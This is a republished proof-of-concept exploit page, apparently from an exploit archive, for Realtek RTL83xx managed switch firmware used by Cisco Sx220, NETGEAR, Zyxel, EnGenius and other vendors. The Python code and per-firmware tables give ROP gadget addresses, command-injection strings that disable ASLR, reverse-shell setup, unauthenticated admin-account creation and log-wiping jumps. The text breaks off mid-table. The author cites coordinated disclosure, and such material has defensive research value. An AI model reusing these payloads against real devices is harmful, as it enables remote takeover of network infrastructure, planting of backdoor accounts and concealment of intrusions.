Cisco Small Business 220 Series – Multiple Vulnerabilities

  • 作者: bashis
    日期: 2019-09-30
  • 类别:
  • 来源:
  • #!/usr/bin/python2.7
    Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
    [Brief description]
    1.	Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
    	Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
    2.	Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
    3.	Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian
    [Goals for this PoC]
    1.	One Python PoC for all vendors
    	Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
    	The python code will read and use details from dictionary when verifying/exploiting
    2.	Uniquely identify remote target
    	ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware
    	ETag: xxxxx-yyyyy
    	xxxxx = file size (up to 5 digits)
    	yyyyy = last modified (up to 5 digits)
    3.	Reverse shell
    	MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible
    4.	add/delete credentials for GUI/CLI
    	Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
    	For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence
    [Technical brief]
    1.	Stack - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
    2.	Heap- Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
    3.	fork- Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell
    Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
    this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request
    First buffer: [aaaaaaaa][0x58xxxxxx]	('a' and 0x58 will be overwritten by second buffer)
    Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx]	(NULL termination will overwrite 0x58)
    [Known targets]
    All below is fully exploitable, with following exception:
    [*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
    [*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
    Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
    and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
    [They are still fully exploitable with the Boa/Hydra vulnerability]
    In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.
    $ ./ --etag help
    [*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
    [*] RHOST:
    [*] RPORT: 80
    [*] LHOST:
    [*] LPORT: 1337
    [+] Target: List of known targets
    [*] ETag: 225-51973 [Cisco Systems, Inc. Sx220 v1.1.3.1]
    [*] ETag: 225-60080 [Cisco Systems, Inc. Sx220 v1.1.4.1]
    [*] ETag: 752-76347 [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
    [*] ETag: 225-21785 [Pakedgedevice & Software Inc SX-8P v1.04]
    [*] ETag: 222-71560 [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
    [*] ETag: 14044-509 [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
    [*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
    [*] ETag: 218-22429 [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
    [*] ETag: 218-7473[PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
    [*] ETag: 752-95168 [DrayTek Corp. VigorSwitch P1100 v2.1.4]
    [*] ETag: 225-96283 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
    [*] ETag: 225-63242 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
    [*] ETag: 224-5061[CERIO Corp. CS-2424G-24P v1.00.29]
    [*] ETag: 222-50100 [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
    [*] ETag: 222-81176 [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
    [*] ETag: 8028-89928[Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
    [*] ETag: 222-64895 [Xhome DownLoop-G24M v3.0.0.43126]
    [*] ETag: 222-40570 [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
    [*] ETag: 222-45866 [Abaniact AML2-PS16-17GP L2 v116B00033]
    [*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
    [*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
    [*] ETag: 609-31457 [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
    [*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
    [*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
    [*] All done...
    [Other vendors]
    These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
    (However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')
    [*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power
    [Known bugs]
    1.	Non-JSON:
    	'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
    	(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)
    [Responsible Disclosure]
    Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
    [Technical details]
    Please read the code
    # Have a nice day
    # /bashis
    import string
    import sys
    import socket
    import argparse
    import urllib, urllib2, httplib
    import base64
    import ssl
    import hashlib
    import re
    import struct
    import time
    import thread
    import json
    import inspect
    import copy
    import hashlib
    from Crypto.Cipher import AES
    from Crypto.Cipher import PKCS1_v1_5
    from Crypto.PublicKey import RSA
    from Crypto import Random
    from random import randint
    from pwn import * # pip install pwn
    global debug
    debug = False
    global force
    force = False
    def DEBUG(direction, text):
    	if debug:
    		# Print send/recv data and current line number
    		print "[BEGIN {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
    		print "\n{}\n".format(text)
    		print "[ END{}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
    class HTTPconnect:
    	def __init__(self, host, proto, verbose, creds, Raw): = host
    		self.proto = proto
    		self.verbose = verbose
    		self.credentials = creds
    		self.Raw = Raw
    	def Send(self, uri, query_headers, query_data,ID,encode_query):
    		self.uri = uri
    		self.query_headers = query_headers
    		self.query_data = query_data
    		self.ID = ID
    		self.encode_query = encode_query
    		# Connect-timeout in seconds
    		#timeout = 5
    		url = '{}://{}{}'.format(self.proto,, self.uri)
    		if self.verbose:"[Verbose] Sending: {}".format(url))
    		if self.proto == 'https':
    			if hasattr(ssl, '_create_unverified_context'):"Creating SSL Unverified Context")
    				ssl._create_default_https_context = ssl._create_unverified_context
    		if self.credentials:
    			Basic_Auth = self.credentials.split(':')
    			if self.verbose:"[Verbose] User: {}, Password: {}".format(Basic_Auth[0],Basic_Auth[1]))
    				pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    				pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
    				auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
    				opener = urllib2.build_opener(auth_handler)
    			except Exception as e:"Basic Auth Error: {}".format(e))
    		if self.query_data:
    			#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
    			if self.query_data and self.encode_query:
    				request = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
    				request = urllib2.Request(url, data=self.query_data, headers=self.query_headers)
    			if self.ID:
    				request.add_header('Cookie', self.ID)
    			request = urllib2.Request(url, None, headers=self.query_headers)
    			if self.ID:
    				request.add_header('Cookie', self.ID)
    		response = urllib2.urlopen(request)
    		#if response:
    		#	print "[<] {} OK".format(response.code)
    		if self.Raw:
    			return response
    			html =
    			return html
    # Validate correctness of HOST, IP and PORT
    class Validate:
    	def __init__(self,verbose):
    		self.verbose = verbose
    	# Check if IP is valid
    	def CheckIP(self,IP):
    		self.IP = IP
    		ip = self.IP.split('.')
    		if len(ip) != 4:
    			return False
    		for tmp in ip:
    			if not tmp.isdigit():
    				return False
    		i = int(tmp)
    		if i < 0 or i > 255:
    			return False
    		return True
    	# Check if PORT is valid
    	def Port(self,PORT):
    		self.PORT = PORT
    		if int(self.PORT) < 1 or int(self.PORT) > 65535:
    			return False
    			return True
    	# Check if HOST is valid
    	def Host(self,HOST):
    		self.HOST = HOST
    			# Check valid IP
    			socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
    			# Now we check if it is correct typed IP
    			if self.CheckIP(self.HOST):
    				return self.HOST
    				return False
    		except socket.error as e:
    			# Else check valid FQDN name, and use the IP address
    				self.HOST = socket.gethostbyname(self.HOST)
    				return self.HOST
    			except socket.error as e:
    				return False
    class Vendor:
    	def __init__(self, ETag):
    		self.ETag = ETag
    	def random_string(self,length):
    		self.length = length
    		return "a" * self.length
    		#return ''.join(random.choice(string.lowercase) for i in range(self.length))
    	# Source:
    	def dict_merge(self, dct, merge_dct):
    		""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
    		updating only top-level keys, dict_merge recurses down into dicts nested
    		to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
    		:param dct: dict onto which the merge is executed
    		:param merge_dct: dct merged into dct
    		:return: None
    		for k, v in merge_dct.iteritems():
    			if (k in dct and isinstance(dct[k], dict)
    					and isinstance(merge_dct[k], collections.Mapping)):
    				self.dict_merge(dct[k], merge_dct[k])
    				dct[k] = merge_dct[k]
    	# Difference between vendors and Firmware versions.
    	# The update code will search below and update the template on the fly
    	# (you can tweak and add code in the template from here)
    	# ETag - excellent tool for determine the target
    	# ETag: xxxxx-yyyyy
    	# xxxxx = file size (up to 5 digits)
    	# yyyyy = last modified (up to 5 digits)
    	def dict(self):
    		Vendor_ETag = {
    			# PLANET Technology Corp.
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'218-22429': {
    				'template':'Planet',					# Static for the vendor
    				'version':'1.0b171116',					# Version / binary dependent stuff
    				'model':'GS-4210-8P2S',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    						# Ping IPv4
    						'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
    						'web_sys_ping_post':0x423B9C,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_ping_post()
    						# traceroute
    						#'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
    						#'web_sys_ping_post':0x4243FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_trace_route_post()
    						'vulnerable': True,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x489368,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x48AB84,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x48C240,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntp_set':0x42DA80,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x42DA80,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x42C868,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'START':0x7ffeee04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			'218-7473': {
    				'template':'Planet',					# Static for the vendor
    				'version':'2.0b160727',					# Version / binary dependent stuff
    				'model':'GS-4210-24T2S',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    						# Ping IPv4
    						'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
    						'web_sys_ping_post':0x424594,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_ping_post()
    						# traceroute
    						#'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
    						#'web_sys_ping_post':0x424DF4,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_trace_route_post()
    						'vulnerable': True,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x48AA98,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x48D9F4,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x48D9F4,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntp_set':0x42E474,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x42E474,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'START':0x7ffeee04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Cisco Systems, Inc.
    			# Sx220 Series
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'225-51973': {
    				'template':'Cisco',						# Static for the vendor
    				'version':'',					# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40F70C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484683c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_sys_ping_set()
    						# Ping IPv4
    						'web_sys_ping_post':0x43535C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&srvHost= ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
    														# /sqfs/home/web/cgi/set.cgi;cgi_sys_tracert_set()
    						# traceroute
    						#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						#'sys_ping_post_cmd':'&srvHost= ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
    						'log_settings_set':0x436FDC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
    						'log_ramClear':0x436F34,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
    						'log_fileClear':0x436F88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
    						'sys_timeSntp_set':0x434FB0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x4350D8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			'225-60080': {
    				'template':'Cisco',						# Static for the vendor
    				'version':'',					# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40ffac,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998530,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24847b6c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_sys_ping_set()
    						# Ping IPv4
    						'web_sys_ping_post':0x43535C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&srvHost= ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
    														# /sqfs/home/web/cgi/set.cgi;cgi_sys_tracert_set()
    						# traceroute
    						#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						#'sys_ping_post_cmd':'&srvHost= ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
    						'log_settings_set':0x436FDC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
    						'log_ramClear':0x436F34,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
    						'log_fileClear':0x436F88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
    						'sys_timeSntp_set':0x434FB0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x4350D8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# EnGenius Technologies, Inc.
    			# EGS series
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'14044-509': {
    				'template':'EnGenius',						# Static for the vendor
    				'version':'1.05.20_150810-1754',					# Version / binary dependent stuff
    				'model':'EGS2110P',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E12C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248405a0,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_tracertSet()
    						# traceroute
    						'web_sys_ping_post': 0x42382C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
    						'vulnerable': True,				# 
    					'stack_cgi_add_account': {
    						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x423E74,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x423E74,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
    						'log_settings_set':0x43DE18,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_ramClear':0x43F934,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_fileClear':0x43F934,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntp_set':0x424844,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x424844,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						'START':0x100181A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# EnGenius Technologies, Inc.
    			# EWS series
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'14044-32589': {
    				'template':'EnGenius',						# Static for the vendor
    				'version':'1.06.21_c1.8.77_180906-0716',					# Version / binary dependent stuff
    				'model':'EWS1200-28TFP',				# Model
    				'verify': { 
    						'cpl_locallogin.cgi (XSS)': {
    							'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
    							'authenticated': False,
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.login (XSS)': {
    							'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
    							'authenticated': False,
    							'vulnerable': True,
    							'safe': True
    						'cpl_logo_ul.cgi': {
    							'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
    							'authenticated': False,
    							'content':'Content-Disposition: filename.png\n------',
    							'vulnerable': True,
    							'safe': True
    						'cpl_locallogin.cgi': {
    							'description':'Stack overflow in "username/password (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password=' + self.random_string(196),
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.login': {
    							'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
    							'vulnerable': True,
    							'safe': True
    						'sn.jrpc.dispatch.cgi': {
    							'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.auth': {
    							'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
    							'authenticated': False,
    							'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
